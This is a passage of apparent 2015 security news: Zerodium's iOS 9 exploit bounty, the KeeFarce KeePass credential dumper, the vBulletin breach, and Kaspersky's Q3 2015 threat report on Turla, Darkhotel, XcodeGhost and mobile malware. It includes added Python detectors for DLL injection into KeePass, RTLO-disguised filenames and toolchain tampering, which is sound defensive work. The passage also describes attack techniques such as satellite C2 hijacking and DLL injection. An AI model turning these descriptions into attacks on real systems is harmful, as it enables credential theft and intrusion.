Secondly, the level of server protection is not always very high, leaving them vulnerable to hacking. If security patches are not regularly installed on a server, it quickly becomes easy prey for cybercriminals: it does not take them long to discover such servers and exploit any known vulnerabilities. Then there is the expanded arsenal of available exploits that appeared after a number of vulnerabilities were found in open-source products, such as exploits for the GHOST vulnerability in glibc (CVE-2015-0235), which is still in use.

Thirdly, the power of a server botnet can be increased by renting additional servers.

In these circumstances, timely installation of security patches on servers becomes critical. For the owners of web resources, effective protection from DDoS attacks originating from server botnets is strongly recommended.

Kim Dotcom's Decentralized Internet — For You, Powered By You

Imagine an Internet that would let you communicate privately with anyone else without censorship, safe from the prying eyes of surveillance authorities…
… decentralized, encrypted, peer-to-peer and, above all, not based on IP addresses.
A new private Internet that would be harder to hack.
This is the dream of many Internet users today and, of course, of Kim Dotcom, the Internet entrepreneur who introduced the Megaupload and MEGA file sharing services to the world.
Kim Dotcom announced plans to start his own private Internet at the beginning of this year and has now revealed more details about MegaNet: a decentralized, non-IP-based network that would share data via blockchains, the technology behind Bitcoin.
On Thursday, Dotcom remotely addressed a conference in Sydney, Australia, where he explained how MegaNet will utilize the power of mobile phones and laptops to operate.
How will MegaNet work?
MegaNet will work on non-IP-based Internet that will use blockchains and new protocols to communicate and exchange data while using the Internet's existing physical infrastructure.
MegaNet will actually rely on the unused processing power of people's smartphones and laptops.
Users with MegaNet on their smartphone would be able to donate their device's processing capability and storage bandwidth when they actually aren't using it.
Dotcom believes that once the service has enough subscribers, this would become an incredibly large amount of power, so much so that it can operate MegaNet.
MegaNet – The Internet For the People, From the People
"If you have a 100 Million smartphones that have the MegaNet app installed we'll have more online storage capacity, calculating power and bandwidth than the top 10 largest websites in the world combined [together], and that is the power of MegaNet," Dotcom said.
"Over the years with these new devices and capacity especially mobile bandwidth capacity, there will be no limitations."
So in short, MegaNet is a decentralized Internet, as Dotcom says, "from the people, for the people."
Encryption Used Won't be Cracked Even by Supercomputers
MegaNet will still use the Internet's existing physical infrastructure that people use today, but will add an extra layer of encryption running through all communications.
Dotcom did not reveal much detail about the encryption he intends to use, but said he is going to rely on very long keys, in systems that won't be "reverse engineered or cracked by any supercomputer."
Difficult to Invade Privacy of Users
Most importantly, MegaNet will make it difficult for law enforcement agencies to invade its users' privacy, as the entire network is fully encrypted.
"If you don't have IP addresses you can not hack the server, you can not execute denial of service [DDoS] attacks on gaming services or websites," Dotcom said from New Zealand, where he's currently awaiting the result of his extradition trial.
The millionaire is confident that MegaNet would be an excellent technology solution that will keep you secure over the Internet, without the requirement of any new infrastructure for users’ privacy.
With the launch of MegaNet, which is expected sometime in 2016, Dotcom hopes 100 Million users to sign-up within the first year of its launch.

Hackers win $1 million bounty for iOS 9 remote hack

A team of hackers has received a million-dollar payout for disclosing an iOS zero-day vulnerability that could allow an attacker to remotely hack any iPhone.
Bad news for Apple users: a team of hackers has received a million-dollar payout for disclosing an iOS zero-day vulnerability that could allow an attacker to remotely hack any iPhone running the latest version of iOS, i.e. iOS 9.

The unknown group of hackers sold the zero-day vulnerability to Zerodium, the exploit-trading company controlled by the security firm Vupen, which specializes in buying and selling zero-day exploits.

In September Zerodium offered a million-dollar prize to anyone who found an unknown, unpatched bug in iOS 9 that could be used to jailbreak Apple devices.

The company announced it would pay for a working exploit able to achieve remote code execution on an iOS device via Safari or Chrome or by SMS/MMS; it also added that the zero-day exploit/jailbreak “must lead to and allow a remote, privileged, and persistent installation of an arbitrary app (e.g. Cydia) on a fully updated iOS 9 device.”

The working exploit may chain several vulnerabilities together to perform the jailbreak, without requiring a reboot or a connection to an external device.

“The whole exploitation/jailbreak process should be achievable remotely, reliably, silently, and without requiring any user interaction except visiting a web page or reading a SMS/MMS (attack vectors such as physical access, Bluetooth, NFC, or baseband are not eligible for the Million Dollar iOS 9 Bug Bounty. ZERODIUM may, at its sole discretion, make a distinct offer to acquire such attack vectors.).”

The exploit/jailbreak must support and work reliably on the following devices (32-bit and 64-bit when applicable):
– iPhone 6s / iPhone 6s Plus / iPhone 6 / iPhone 6 Plus
– iPhone 5 / iPhone 5c / iPhone 5s
– iPad Air 2 / iPad Air / iPad (4th generation) / iPad (3rd generation) / iPad mini 4 / iPad mini 2

Now it seems that someone has found a way to remotely hack the new iPhone.

As I have explained several times, an untethered jailbreak gives users root access to the operating system of Apple devices, allowing them to bypass the security features designed by Apple.

Jailbreaking a device makes it possible to install and execute software that could not otherwise be installed or run on that device, or to remove pre-installed software that could not otherwise be uninstalled.

In the attack scenario described by the group of hackers, they are able to exploit a zero-day in order to perform a remote browser-based jailbreak. Experts speculate that the new zero-day works on the new iPhone 6 and iPhone 5 models, iPad Air 2 and Air, iPad 4 and 3, and the iPad mini 4 and iPad mini 2.

The bug hunters found three flaws in iOS 9.x and Google Chrome that allowed them to remotely hack any iPhone running iOS 9.x.

“No software other than iOS really deserves such a high bug bounty,” founder Chaouki Bekrar told Vulture South. “Our bounty required much more work than a classic jailbreak as it had to be remote and browser-based, so this required two to three additional zero-days compared to a public jailbreak.” “The exploit chain includes a number of vulnerabilities affecting both Google Chrome browser and iOS, and bypassing almost all mitigations in place.”

According to Bekrar, the winners submitted the zero-day exploit a few hours before the contest closed; another team of hackers reported a partial jailbreak and could receive a partial reward.

Zerodium is currently testing the exploit. Only Zerodium's clients will have access to the remote browser-based untethered jailbreak; the company confirmed that the zero-day will not be disclosed publicly.

“We will first report the vulnerabilities to our customers, and we may later report them to Apple,” Bekrar added.
Who are the clients of companies like Zerodium and Vupen? Which is the final use of such kind of zero-day exploits?

The exploits could be acquired by totalitarian governments that could use them for surveillance and to track opponents. An attacker could use them to install any application that could allow to track individuals, including spyware and surveillance software.

Apple users have no choice: they must hope that security experts at Apple find the zero-day bugs and fix them before someone exploits them in the wild.

KeeFarce Hacking tool steals encrypted credentials from KeePass password manager

KeeFarce is a recently released hacking tool that swipes credentials from the KeePass password manager through DLL injection.
A password manager is considered one of the most secure ways to store strong passwords on a computer. Unfortunately, the presence of malware on the PC can expose those passwords even though they are stored by a password manager.

A recently released hacking tool dubbed KeeFarce silently decrypts all usernames, passwords and notes stored by the popular KeePass password manager and writes them to a file.

“Indeed, if the operating system is owned, then it’s game over,” Denis Andzakovic, a researcher at Security-Assessment.com and the creator of KeeFarce, told Ars.

Attackers can run KeeFarce on a computer where a logged-in user has unlocked the KeePass database; under this condition, KeeFarce is able to dump the entire password archive.

KeeFarce hacking tool KeePass

“The point of KeeFarce is to actually obtain the contents of the password database. Say a penetration tester has achieved domain admin access to a network but also wants to obtain access to networking hardware, non-domain infrastructure, etcetera. The tester can compromise a sysadmin’s machine and use the tool to swipe the password details from the KeePass instance the sysadmin has open.” added Andzakovic.

KeeFarce bypasses the process memory protection implemented by KeePass and extracts the passwords from the database by injecting a dynamic-link library into the running process. The injected DLL invokes an existing KeePass function that exports the contents of the currently open database to an external file in CSV format. The extracted data is in clear text and includes user names, passwords, notes and URLs.

DLL injection is a common technique that allows programs to interoperate, but it can be abused to run malicious code in the context of a running application.

KeeFarce works against KeePass 2.28, 2.29 and 2.30 running on Windows 8.1 (32 and 64 bit), it should also work on older Windows machines.
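Since the tool needs to open the KeePass process and start a thread in it, the injection itself is observable on the host. The following is an added example, not part of KeeFarce or KeePass, that scans Windows Sysmon telemetry for that pattern. The events are constructed dicts mirroring the fields of Sysmon Event ID 8 (CreateRemoteThread) and Event ID 10 (ProcessAccess); the source-process allowlist, the `KeeFarce.exe` path, and the assumption that the injector uses the classic CreateRemoteThread-into-LoadLibrary pattern (the page does not detail KeeFarce's own mechanics) are illustrative.

```python
"""Detect remote-thread injection into a running KeePass process from
Sysmon telemetry. Added example, not code from KeeFarce or KeePass.
The events below are constructed; their fields mirror Sysmon Event ID 8
(CreateRemoteThread) and Event ID 10 (ProcessAccess). The allowlist and
the access-right mask are assumptions for illustration."""
import ntpath

# Windows process access rights relevant to injection.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

TARGET = "keepass.exe"
# Assumption: csrss.exe legitimately touches every process; tune per estate.
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe"}

# Constructed sample events (paths and values are illustrative).
EVENTS = [
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Program Files\KeePass\KeePass.exe", "GrantedAccess": "0x1400"},
    {"EventID": 10, "SourceImage": r"C:\Users\admin\Downloads\KeeFarce.exe",
     "TargetImage": r"C:\Program Files\KeePass\KeePass.exe", "GrantedAccess": "0x1F0FFF"},
    {"EventID": 8, "SourceImage": r"C:\Users\admin\Downloads\KeeFarce.exe",
     "TargetImage": r"C:\Program Files\KeePass\KeePass.exe",
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL", "StartFunction": "LoadLibraryW"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Program Files\KeePass\KeePass.exe",
     "StartModule": "", "StartFunction": ""},
    {"EventID": 8, "SourceImage": r"C:\Users\admin\Downloads\KeeFarce.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe",
     "StartModule": r"C:\Windows\System32\KERNEL32.DLL", "StartFunction": "LoadLibraryW"},
]


def _base(path):
    """Lower-cased file name of a Windows path, independent of host OS."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return a reason string if the event looks like injection into
    KeePass, otherwise None."""
    if _base(event.get("TargetImage", "")) != TARGET:
        return None
    src = event.get("SourceImage", "")
    if src.lower() in ALLOWED_SOURCES:
        return None
    eid = event["EventID"]
    if eid == 8:
        fn = event.get("StartFunction", "")
        if fn.startswith("LoadLibrary"):
            # Thread start at LoadLibrary* is the textbook DLL-injection signature.
            return f"remote thread via {fn} in KeePass from {src}"
        return f"remote thread created in KeePass from {src}"
    if eid == 10:
        granted = int(event["GrantedAccess"], 16)
        if granted & INJECT_MASK:
            return f"handle to KeePass with write/thread rights (0x{granted:X}) from {src}"
    return None


def scan(events):
    """Return [(EventID, reason)] for every suspicious event, in order."""
    hits = []
    for e in events:
        reason = classify(e)
        if reason:
            hits.append((e["EventID"], reason))
    return hits


if __name__ == "__main__":
    for eid, reason in scan(EVENTS):
        print(f"EID {eid}: {reason}")
```

The ProcessAccess check fires before the thread is created, which gives a response team the earlier signal; the CreateRemoteThread check confirms that code actually started in the password manager.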

Tools like KeeFarce remind us that a password manager can be a single point of failure: once the host is compromised, everything it holds is exposed at the moment the user unlocks it.

Similar tools could be used to hack also other commercial password managers.

Hackers WIN $1 Million Bounty for Remotely Hacking latest iOS 9 iPhone

Well, here's some terrible news for all Apple iOS users…
Someone just found an iOS zero-day vulnerability that could allow an attacker to remotely hack your iPhone running the latest version of iOS, i.e. iOS 9.
Yes, an unknown group of hackers has sold a zero-day vulnerability to Zerodium, a startup of the French company Vupen that buys and sells zero-day exploits.
And Guess what, in How much?
$1,000,000. Yes, $1 Million.
Last month, a Bug bounty challenge was announced by Zerodium for finding a hack that must allow an attacker to remotely compromise a non-jailbroken Apple device through:
A web page on Safari or Chrome browser,
In-app browsing action, or
Text message or MMS.

Zerodium's founder Chaouki Bekrar confirmed on Twitter that an unnamed group of hackers has won this $1 Million bounty for successfully submitting a remote browser-based iOS 9.1/9.2b untethered jailbreak exploit.
NO More Fun. It's Serious Threat to iOS Users
For those who are not aware, this remote Jailbreak is not really cool.
Why? Because…
The only difference between a malicious cyber attack and a jailbreak is the payload, the code that executes on the target system after exploitation.
A traditional jailbreak is usually used to deploy an alternative app store, but in the hands of hackers or law enforcement agencies the same exploit can install any app they want with full privileges, i.e. spyware, malware or surveillance software.
Moreover, We know that Zerodium's parent company Vupen develops hacking techniques based on those bugs and typically sells them to multiple government customers.
So, the chances are high that the firm will resell the newly discovered and undisclosed remote iOS zero-day jailbreak exploit to its clients, which are said to include Spy agencies, Governments, and Law enforcement agencies.
Your Turn, Apple…
Let's see how much time Apple security team will now take to find out this open zero-day bug in its software and close the doors before it gets too late.

Meet The World's First Person Who Hacked His Body to Implant a Bitcoin Payment CHIP

Hackers are now going crazy and trying new ways in Biohacking.
Until now, we have seen a hacker who implanted a small NFC chip in his hand in order to hack Android smartphones and bypass almost all security measures.
However, now the level of craziness has gone to a whole new level.
A Swedish hacker has devised a neat trick that makes him able to buy groceries or transfer money between bank accounts by just waving his hand.
Yes, you heard that right. Patric Lanhed, a software developer at DigitasLBi, implanted a small NFC (Near Field Communications) chip with the private key to his Bitcoin wallet under his skin.
So How Does the Trick Work?
To send a Bitcoin payment from one digital wallet to another, he just has to wave his hand over an NFC reader, which scans the data; custom software then confirms the authenticity of the key and triggers the transfer. Note the trade-off: an NFC tag answers any reader brought within range, so if the raw private key is what is stored on the implant, anyone able to scan it can also spend from the wallet.
A proof-of-concept video by Patric and his acquaintance Juanjo Tara Ortiz, an engineer at Arduino, shows a successful Bitcoin payment from one wallet to another. The transaction is, the duo claim…
The World's First "Bio-Payment" — a way to send and receive money using:
Data stored inside a human body
A custom software app built on top of a Bitcoin wallet’s developer API.
Bitcoin-related NFC technology has been around for a while, but this chip implant approach takes the potential of this technology to the next level.

$1 BILLION invested in Bitcoin Firms So Far
Major companies, including American Express (AXP), MasterCard, Bain Capital and the New York Stock Exchange, have invested overall, a record-breaking $1 Billion into Bitcoin-related tech startups.
The Bitcoin technology promises to transform the way we trade stocks, get paid, send money to each other, and much more. Its backers also present it as a way to reduce payment fraud.
So, one can see the future of Bitcoin payments using the bio-payment system.
The Future of Bio-Payments
Bitcoin is just the beginning of their research, as the duo believe that they can turn this payment transfer system into a bio-payment terminal system to be used in stores.
So in the near future, the custom software developed by the duo should allow people to store different types of data, not only Bitcoin keys, on their chips.
They claim the applications besides a bio-payment will include:
Medical records
ID papers like an embedded Passport
Travel documents
ICE (In Case of Emergency) tags
Data authentication for consumer applications like vehicle entry, home security, computer authorization, and many more
VCard exchange over a phone and lot more applications
So be ready, as the age of Bio-Payments has arrived.

The official website of the popular vBulletin forum has been hacked

The website of the vBulletin forum software is down for maintenance following a data breach that exposed personal information of hundreds of thousands of users.
On Sunday, the official vBulletin website was hacked by an attacker using the moniker “Coldzer0.” The website was defaced and the vBulletin forum displayed the message “Hacked by Coldzer0.”

At the time of writing the website is down for maintenance and there are no details on the attack; according to DataBreaches.net, the vBulletin and Foxit Software forums were both hacked by Coldzer0, who stole hundreds of thousands of user records.

The hacker published screenshots showing that he managed to upload a shell to the vBulletin forum website and access user personal information, including user IDs, names, email addresses, security questions and answers, and password salts.


I suggest users to change their passwords as soon as possible, especially if they share the same credentials across other websites.

DataBreaches.net has linked the online moniker “Coldzer0” to the malware analyst and security researcher Mohamed Osama. The Egyptian expert Osama has promptly removed all references to the vBulletin attack from his social media accounts. Osama has also deleted his personal website, coldroot.com, after his name was in the headlines due to the attack to vBulletin.


The hacker claims to have exploited a zero-day vulnerability affecting the vBulletin forum to hack the popular application.

It is not the first time that hackers have targeted vBulletin: in 2013, experts at the security firm Imperva discovered that more than 35,000 websites based on vBulletin had been hacked through a known vulnerability.

IT threat evolution in Q3 2015
2.11.2015 Source: Kaspersky


Q3 in figures

According to KSN data, Kaspersky Lab solutions detected and repelled a total of 235,415,870 malicious attacks from online resources located all over the world.
75,408,543 unique URLs were recognized as malicious by web antivirus components.
Kaspersky Lab’s web antivirus detected 38,233,047 unique malicious objects: scripts, exploits, executable files, etc.
There were 5,686,755 registered notifications about attempted malware infections that aim to steal money via online access to bank accounts.
Kaspersky Lab’s file antivirus detected a total of 145,137,553 unique malicious and potentially unwanted objects.
Kaspersky Lab mobile security products detected:
1,583,094 malicious installation packages;
323,374 new malicious mobile programs;
2516 mobile banker Trojans.

Targeted attacks

Turla’s ‘eye in the sky’

We’ve written about Turla several times over the last year or so (our initial report, follow-up analysis and campaign overview can be found on securelist.com). The group behind this cyber-espionage campaign has been active for more than eight years, infecting hundreds of computers in more than 45 countries. The organizations targeted include government agencies, embassies, military, education, research and pharmaceutical companies.

The Turla group profiles its victims, using watering-hole attacks in the initial stages. However, as outlined in our latest report, for subsequent operations the group makes use of satellite communications to manage its C2 (Command-and-Control) traffic.

Most people think of satellite communications as a means of broadcasting TV, but they are also used to provide Internet access. Typically, this is done in remote locations where other types of Internet access are slow, unstable or unavailable. One of the most widespread and least expensive means of obtaining satellite-based access is through a downstream-only connection.

The method used by Turla to hijack downstream satellite links does not require a valid satellite Internet subscription. The key benefit is that it’s anonymous – it’s very hard to identify the attackers. The satellite receivers can be located anywhere within the area covered by the satellite (typically a wide area) and the true location and hardware of the C2 server can’t be easily identified or physically seized. It’s also cheaper than purchasing a satellite-based link and easier than hijacking traffic between the victim and the satellite operator and injecting packets along the way.

To attack satellite-based Internet connections, the attackers point their own satellite dishes at the same satellite that the legitimate users of these links receive from. They exploit the fact that the downstream packets are unencrypted. Once an IP address that is routed through the satellite’s downstream link has been identified, the attackers start listening for packets coming from the Internet to this specific IP. When a packet arrives, they identify the source and spoof a reply back to it over a conventional Internet line. At the same time, the legitimate user of the link simply ignores the packet, because it is addressed to an otherwise unused port (for instance, port 80 or 10080). You can find a graphical explanation of how Turla uses satellite links here.

The Turla group tends to focus on satellite Internet providers located in the Middle East and Africa, including Congo, Lebanon, Libya, Niger, Nigeria, Somalia and the UAE. Satellite broadcasts from these countries don’t normally cover European and North American countries, making it very hard for security researchers to investigate such attacks.


The use of satellite-based Internet links is an interesting development. The hijacking of downstream bandwidth is cheap (around $1,000 for the initial investment and around $1,000 per year in maintenance), easy to do and offers a high degree of anonymity. On the downside, it’s not always as reliable as more traditional methods such as bullet-proof hosting, multiple proxy levels and hacked web sites – all of which Turla also uses. This makes it less likely that it will be used to maintain extensive botnets. Nevertheless, if this method becomes widespread among APT groups or cybercriminals, it will pose a serious problem for the IT security industry and law enforcement agencies.

Darkhotel extends its ‘guest’ list

In November 2014, we reported on the Darkhotel APT. These attacks were characterized by the misuse of stolen certificates, the deployment of HTA files using multiple methods and the infiltration of hotel Wi-Fi networks to place backdoors on targets’ computers.

Recently we published an update on Darkhotel. While the attackers behind this APT continue to use the above methods, they have also supplemented their armoury. They have shifted their attention more towards spear-phishing of their chosen victims. As well as using HTA files, they are also deploying infected RAR files, using the RTLO (right to left override) mechanism to mask the real extension of the file. The attackers also use Flash exploits, including a zero-day exploit leaked as a result of the Hacking Team security breach.
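The RTLO trick mentioned above relies on the Unicode right-to-left override character (U+202E): everything after it is rendered reversed, so a file whose real name ends in `fdp.exe` is displayed as ending in `exe.pdf`. The following is an added example, not code from the Kaspersky report, that exposes the mismatch between the displayed and the real extension; the sample filenames are constructed, and the rendering model assumes a single override with no terminating U+202C, which is the common lure form.

```python
"""Reveal filenames that use Unicode bidirectional override characters to
disguise their real extension (the RTLO trick described for Darkhotel's
RAR lures). Added example, not from the Kaspersky report; the sample
names are constructed."""

# Explicit bidi controls an attacker can embed; U+202E (RLO) is the usual one.
BIDI_CONTROLS = {
    "\u202A": "LRE", "\u202B": "RLE", "\u202C": "PDF", "\u202D": "LRO", "\u202E": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}


def displayed_name(name):
    """Approximate what a file manager renders: text after an RLO is drawn
    right-to-left, i.e. reversed, until the end of the string.
    Assumption: a single RLO with no PDF terminator (the common lure form)."""
    idx = name.find("\u202E")
    if idx == -1:
        return name
    return name[:idx] + name[idx + 1:][::-1]


def _extension(name):
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def inspect_filename(name):
    """Return the bidi controls found, the extension the OS will actually
    use, the extension the user sees, and whether the two disagree."""
    controls = [(i, BIDI_CONTROLS[c]) for i, c in enumerate(name) if c in BIDI_CONTROLS]
    stripped = "".join(c for c in name if c not in BIDI_CONTROLS)
    true_ext = _extension(stripped)
    shown_ext = _extension(displayed_name(name))
    return {
        "has_bidi_control": bool(controls),
        "controls": controls,
        "true_extension": true_ext,
        "displayed_extension": shown_ext,
        "suspicious": bool(controls) and true_ext != shown_ext,
    }


if __name__ == "__main__":
    # Constructed samples: a disguised executable, a disguised screensaver,
    # and a harmless name for comparison.
    for sample in ("Invoice_\u202Efdp.exe", "photo\u202Egpj.scr", "notes.txt"):
        info = inspect_filename(sample)
        print(f"{displayed_name(sample)!r}: really .{info['true_extension'] or '-'}"
              f" -> {'SUSPICIOUS' if info['suspicious'] else 'ok'}")
```

A mail gateway or endpoint agent can apply the same rule to archive members, which is where this lure usually lives: any bidi control in a filename is worth a block on its own, and a mismatch between the two extensions is near-certain deception.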

In 2015, Darkhotel extended its geographic reach, to include victims in North Korea, Russia, South Korea, Japan, Bangladesh, Thailand, India, Mozambique and Germany.

Blue Termite

In August, we reported on the Blue Termite APT, a targeted attack campaign focused on stealing information from organizations in Japan. These include government agencies, local government bodies, public interest groups, universities, banks, financial services, as well as companies working in sectors such as energy, communication, heavy industry, chemical, automotive, electrical, news media, information services, health care, real estate, food, semiconductor, robotics, construction, insurance, transportation, and more. One of the most high profile targets was the Japan Pension Service.


The malware is customized according to the specific victim. The Blue Termite backdoor stores data about itself – including C2, API name, strings for anti-analysis, values of mutexes, as well as the MD5 checksum of backdoor commands and the internal proxy information. The data are stored in encrypted form, making analysis of the malware more difficult – a unique decryption key is required for each sample.

The main method of infection, as with so many targeted attack campaigns, is via spear-phishing e-mails. However, we have detected other methods of infection. These include drive-by downloads using a Flash exploit (CVE-2015-5119) – one of the exploits leaked following the Hacking Team security breach. Several Japanese web sites were compromised this way. We also found some watering-hole attacks, including one on a web site belonging to a prominent member of the Japanese government.

Malware stories

End of the line for CoinVault?

On 14 September 2015, Dutch police arrested two men for suspected involvement in CoinVault ransomware attacks, following a joint effort by Kaspersky Lab, Panda Security and the Dutch National High Tech Crime Unit (NHTCU), highlighting the benefit of collaboration between police and security researchers. This malware campaign started in May 2014 and continued into this year, targeting victims in more than 20 countries, with the majority in the Netherlands, Germany, the United States, France and Great Britain. The attackers successfully encrypted files on more than 1,500 Windows-based computers, demanding payment in bitcoin to decrypt the data on victims’ machines.

The cybercriminals responsible for this ransomware campaign modified their creations several times to keep on targeting new victims. We published our first analysis of CoinVault in November 2014, soon after the first sample of the malicious program appeared. The campaign then stopped until April 2015, when we found a new sample. In the same month, Kaspersky Lab and the Dutch NHTCU launched a web site to act as a repository of decryption keys. In addition, we also made available online a decryption tool to help victims recover their data without having to pay the ransom.

After publishing the site, Kaspersky Lab was contacted by Panda Security, which had found information about additional malware samples. We were able to confirm that the samples were related to CoinVault. We passed this information to the Dutch NHTCU.

You can find our analysis of the twists and turns employed by the CoinVault authors here.

Ransomware has become a notable fixture of the threat landscape. While this case shows that collaboration between researchers and law enforcement agencies can lead to positive results, it’s essential for consumers and businesses alike to take steps to mitigate the risks of this type of malware. Ransomware operations rely on their victims paying up. On top of anti-malware protection, it’s important to make regular backups of data, to avoid data loss and the need to make such ransom payments.

A serpent in Apple’s walled garden

The recent appearance of malicious apps in the App Store has made it clear that, contrary to what many people believe, iOS is not immune to malware.

The malware, called ‘Xcodeghost’, infected dozens of apps, including WeChat, NetEase’s music download app, business card scanner CamCard and Didi Kuadi’s car-hailing app. The Chinese versions of Angry Birds 2 were also infected.

The attackers didn’t hack the App Store, but hosted a malicious version of Apple’s Xcode. Xcode is a free suite of tools used by software developers to create iOS apps. It is officially distributed by Apple, but also unofficially by third parties: someone in China hosted a version of Xcode that contained XcodeGhost. Some Chinese developers choose to download development tools such as this from local servers because it is much quicker.

Any app built with the modified version of Xcode would be infected. The infected apps steal data from their victims and send it to the attackers. It was initially believed that 39 infected apps had bypassed Apple’s scanning process and been successfully uploaded to the App Store. Apple has removed the infected apps. However, the compromised version of Xcode had been available for around six months, so the total number of infected apps could be much higher, not least because the source code for XcodeGhost has been published on GitHub.

You can find an analysis of XcodeGhost by researchers at Palo Alto Networks here.

The incident highlights the danger of programs being infected at source if tools used by developers are compromised.
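The defence that would have caught a tampered Xcode copy is to pin the toolchain obtained through the official channel and refuse to build with anything that differs. The following is an added example, not Apple's tooling or anything from the report: it builds a SHA-256 manifest of a tool directory and diffs a later copy against it. The directory tree and file contents are constructed in a temporary directory; the names are stand-ins, not the real Xcode layout.

```python
"""Pin and verify a developer toolchain before building with it.
Added example, not part of Apple's or anyone's tooling. The file tree is
constructed in a temporary directory; names and contents are stand-ins."""
import hashlib
import os
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 so large tool binaries don't load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map relative path -> sha256 for every regular file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def verify_manifest(root, expected):
    """Return (modified, added, missing) relative paths versus the pinned
    manifest. A build should be refused unless all three lists are empty."""
    actual = build_manifest(root)
    modified = sorted(p for p in expected if p in actual and actual[p] != expected[p])
    added = sorted(set(actual) - set(expected))
    missing = sorted(set(expected) - set(actual))
    return modified, added, missing


def demo():
    """Simulate XcodeGhost-style tampering: after the manifest is pinned, a
    framework inside the toolchain is altered and an extra object dropped in.
    Returns the verification result. (Constructed scenario.)"""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "Library", "Frameworks")
        os.makedirs(lib)
        framework = os.path.join(lib, "CoreServices.framework")  # stand-in file
        with open(framework, "wb") as f:
            f.write(b"genuine framework bytes")
        with open(os.path.join(root, "clang"), "wb") as f:
            f.write(b"genuine compiler bytes")

        pinned = build_manifest(root)  # taken from the official download
        assert verify_manifest(root, pinned) == ([], [], [])

        with open(framework, "ab") as f:          # code appended to a framework
            f.write(b"\n// injected")
        with open(os.path.join(lib, "malicious.o"), "wb") as f:  # extra object file
            f.write(b"payload")
        return verify_manifest(root, pinned)


if __name__ == "__main__":
    modified, added, missing = demo()
    print("modified:", modified)
    print("added:", added)
    print("missing:", missing)
```

The pinned manifest must come from a copy downloaded from Apple, not from the mirror being checked; otherwise the check only proves the mirror is consistent with itself, which is exactly the situation the Chinese developers were in.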

The Gaza cyber-gang

At the end of September we reported on the activities of another regional APT, the Gaza cyber-gang. This is a politically motivated Arabic group operating in the MENA region (Middle East and North Africa) – mainly focused on Egypt, the UAE and Yemen. The group is interested in government agencies – especially embassies, where security and IT operations might not be well-established or reliable. The Gaza cyber-gang has been active since 2012, but became particularly active in the second quarter of 2015.

The gang actively sends malware to IT and Incident Response (IR) staff in target organizations: the file names they use reflect IT functions and IR tools used to investigate cyber-attacks. It’s not hard to work out why. IT staff typically have greater access rights than other employees, because it’s their job to manage the corporate infrastructure. IR employees are likely to have access to sensitive data related to ongoing cyber-investigations, as well as extended access rights to help them look for suspicious activities across the network. This means the attackers not only gain access to the target organization but also extend their reach across the network.

The main infection modules used by the group are widely used remote access Trojans (RATs): XtremeRAT and PoisonIvy. Their activities are heavily reliant on social engineering. They use filenames related to IT and IR functions and content and domain names that are likely to be of interest to their victims (e.g. ‘.gov.uae.kim’).


All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Mobile threats

Displaying adverts to users is still the main method of making money from mobile threats. The number of programs displaying intrusive advertising on mobile devices (adware) continued to grow in the third quarter and accounted for more than half of all detected mobile objects.

We have also observed a growing number of programs that use advertising as the main monetization method while also using other methods from the virus writers’ arsenal. They often root the device of a victim and use superuser privileges, making it very difficult, if not impossible, to combat them. In Q3 2015, these Trojans accounted for more than half of the Top 20 most popular mobile malware.

SMS Trojans are still relevant as a monetization method, especially in Russia. These programs send paid messages from an infected device without the user’s knowledge. Although their overall traffic share among mobile threats continues to fall, the malicious mobile Trojan-SMS still leads in terms of the number of new samples detected in the third quarter.

The pursuit of profit is not limited to displaying adverts or sending paid text messages – cybercriminals are also very interested in users’ bank accounts. In Q3 2015, the total share of mobile bankers and spyware designed to steal personal information exceeded that of SMS Trojans in new mobile malware traffic by 0.7 p.p.

The number of new mobile threats

In Q3 2015, Kaspersky Lab mobile security products detected 323,374 new malicious mobile programs – a 1.1-fold increase on Q2 2015 and a 3.1-fold increase on Q1.

The number of malicious installation packages detected was 1,583,094 – this is 1.5 times more than in the previous quarter.

Figure: Number of malicious installation packages and new malicious mobile programs detected (Q1 2015 – Q3 2015)

Distribution of mobile malware by type

Figure: Distribution of new mobile malware by type, Q2 and Q3 2015

Potentially unwanted advertising programs (adware) headed the ranking of detected objects for mobile devices in Q3 2015. In the previous quarter this category of programs occupied second place with 19%; in Q3 their share grew considerably and reached 52.2%.

Second came RiskTool. The programs in this category are legitimate applications that are potentially dangerous for users – if used carelessly or manipulated by a cybercriminal, they could lead to financial losses. RiskTool was knocked off top spot after its share decreased by 16.6 p.p. from the previous quarter.

The percentage of SMS Trojans in the overall flow of mobile threats decreased by another 1.9 p.p. and amounted to 6.2%. Despite this, they are still among the leading mobile malicious programs.

SMS Trojans were followed by Spy Trojans (5.4%). These programs steal personal data from users, including incoming text messages (mTANs) from banks.

In the third quarter of 2015, the biggest growth rates were demonstrated by Trojan-Banker whose share more than doubled and accounted for 1.5% compared to 0.6% in the previous quarter. In Q2, 630 of these programs were detected, while Q3 saw their number increase four-fold and exceed 2500.

Top 20 malicious mobile programs

Please note that the ranking of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

Name % of attacked users*
1 DangerousObject.Multi.Generic 46.6
2 Trojan.AndroidOS.Rootnik.d 9.9
3 Trojan-SMS.AndroidOS.Podec.a 7.4
4 Trojan-Downloader.AndroidOS.Leech.a 6.0
